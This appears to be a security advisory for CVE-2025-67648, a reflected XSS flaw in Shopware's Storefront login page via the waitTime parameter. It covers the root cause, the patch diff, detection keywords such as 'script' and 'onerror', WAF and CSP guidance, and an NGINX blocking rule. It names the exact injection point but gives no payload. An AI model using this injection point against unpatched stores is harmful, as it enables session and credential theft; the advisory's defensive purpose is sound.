CVE-2025-67648: Shopware Reflected XSS Vulnerability

CVE-2025-67648 Overview

CVE-2025-67648 is a Reflected Cross-Site Scripting (XSS) vulnerability in Shopware, an open commerce platform. The flaw resides in AuthController.php, where the waitTime request parameter from the login page URL is rendered directly into the Storefront login Twig template without input validation. An attacker can inject malicious script content through the URL parameter, which executes in the browser of any victim who clicks a crafted link. The vulnerability affects Shopware versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0. Fixes are available in versions 6.6.10.10 and 6.7.5.1. The issue is tracked under [CWE-79].

Critical Impact

Attackers can execute arbitrary JavaScript in a victim's browser session, enabling session theft, credential harvesting on the login page, and storefront defacement.

Affected Products

• Shopware 6.4.6.0 through 6.6.10.9
• Shopware 6.7.0.0 through 6.7.5.0
• Shopware Storefront login component (AuthController.php)

Discovery Timeline

• 2025-12-11 - CVE-2025-67648 published to NVD
• 2026-03-17 - Last updated in NVD database

Technical Details for CVE-2025-67648

Vulnerability Analysis

The vulnerability stems from unsafe handling of user-controlled query string parameters on the Shopware Storefront login page. The AuthController reads the waitTime, loginError, and errorSnippet values directly from the HTTP request and passes them into the Twig template login.html.twig. The template then renders these values inside an alert component without sufficient sanitization. Because waitTime is intended to display a numeric throttle countdown, it lacks type enforcement, allowing attackers to substitute arbitrary HTML or JavaScript. The login page processes the payload server-side and reflects it in the rendered response.

Root Cause

The root cause is improper neutralization of input during web page generation [CWE-79]. The pre-patch controller called $request->get('waitTime') to pull values directly from the query string. The Twig template passed waitTime into a translation function and then through sw_sanitize, but the sanitizer configuration did not strip script-capable content in this rendering path. There was no numeric coercion or attribute-level validation before template interpolation.

Attack Vector

Exploitation requires user interaction. An attacker crafts a URL pointing to the Shopware login page with a malicious waitTime parameter and lures a victim to click it through phishing, malvertising, or a third-party site. When the victim loads the page, the injected payload executes in the context of the Shopware storefront origin. The patched code switches from $request->get() to $request->attributes->get(), ensuring values come from internal route attributes rather than user input, and applies number_format to coerce waitTime to a numeric value.

             'redirectParameters' => $request->get('redirectParameters', json_encode([])),
             'errorRoute' => $request->attributes->get('_route'),
             'page' => $page,
-            'loginError' => (bool) $request->get('loginError'),
-            'waitTime' => $request->get('waitTime'),
-            'errorSnippet' => $request->get('errorSnippet'),
+            'loginError' => $request->attributes->getBoolean('loginError'),
+            'waitTime' => $request->attributes->get('waitTime'),
+            'errorSnippet' => $request->attributes->get('errorSnippet'),
             'data' => $data,
         ]);
     }
// Source: https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58

                             {% if errorSnippet != null %}
                                 {% sw_include '@Storefront/storefront/utilities/alert.html.twig' with {
                                     type: 'danger',
-                                    content: errorSnippet|trans|sw_sanitize
+                                    content: errorSnippet|trans|sw_sanitize({}, true)
                                 } %}
                             {% elseif waitTime != null %}
                                 {% sw_include '@Storefront/storefront/utilities/alert.html.twig' with {
                                     type: 'info',
-                                    content: 'account.loginThrottled'|trans({'%seconds%': waitTime})|sw_sanitize
+                                    content: 'account.loginThrottled'|trans({'%seconds%': waitTime|number_format})|sw_sanitize
                                 } %}
// Source: https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58

Detection Methods for CVE-2025-67648

Indicators of Compromise

• Web server access logs containing requests to /account/login with a waitTime query parameter holding non-numeric values or HTML-encoded characters such as <, >, script, or onerror.
• Referer headers pointing to external domains for traffic landing on the login page with suspicious query strings.
• Unusual spikes in failed login attempts immediately followed by storefront visits carrying crafted waitTime parameters.

Detection Strategies

• Deploy a web application firewall (WAF) rule that blocks or flags requests to Shopware login routes where waitTime contains characters outside [0-9].
• Inspect HTTP request bodies and query strings for XSS payload signatures targeting waitTime, loginError, and errorSnippet parameters.
• Correlate browser-side Content Security Policy (CSP) violation reports with server request logs to identify reflected injection attempts.

Monitoring Recommendations

• Enable verbose logging on the Shopware Storefront reverse proxy and forward to a central analytics platform.
• Monitor outbound DNS and HTTP requests from storefront sessions for unexpected callbacks to attacker-controlled domains.
• Track patch deployment across Shopware instances and alert when versions below 6.6.10.10 or between 6.7.0.0 and 6.7.5.0 remain in production.

How to Mitigate CVE-2025-67648

Immediate Actions Required

• Upgrade Shopware to version 6.6.10.10 or 6.7.5.1 as published in the GitHub Security Advisory.
• Audit web server logs for prior requests containing crafted waitTime parameters and review affected user sessions.
• Rotate any administrative session tokens or credentials suspected of exposure through the login page.

Patch Information

Shopware released the fix in commit c9242c02c84595d9fa3e2adf6a264bc90a657b58. The patch moves waitTime, loginError, and errorSnippet values from query parameters to internal request attributes, applies number_format to coerce waitTime to a numeric value, and enables strict mode on sw_sanitize for errorSnippet. Full details are in the GitHub Security Advisory GHSA-6w82-v552-wjw2.

Workarounds

• Configure a WAF rule to reject requests to /account/login where waitTime is non-numeric until the patch is applied.
• Enforce a strict Content Security Policy that disallows inline scripts on storefront login pages to limit payload execution.
• Restrict access to administrative storefront routes via IP allowlisting where feasible.

# Example NGINX rule to block non-numeric waitTime parameters
location /account/login {
    if ($arg_waitTime !~ "^[0-9]*$") {
        return 400;
    }
    proxy_pass http://shopware_backend;
}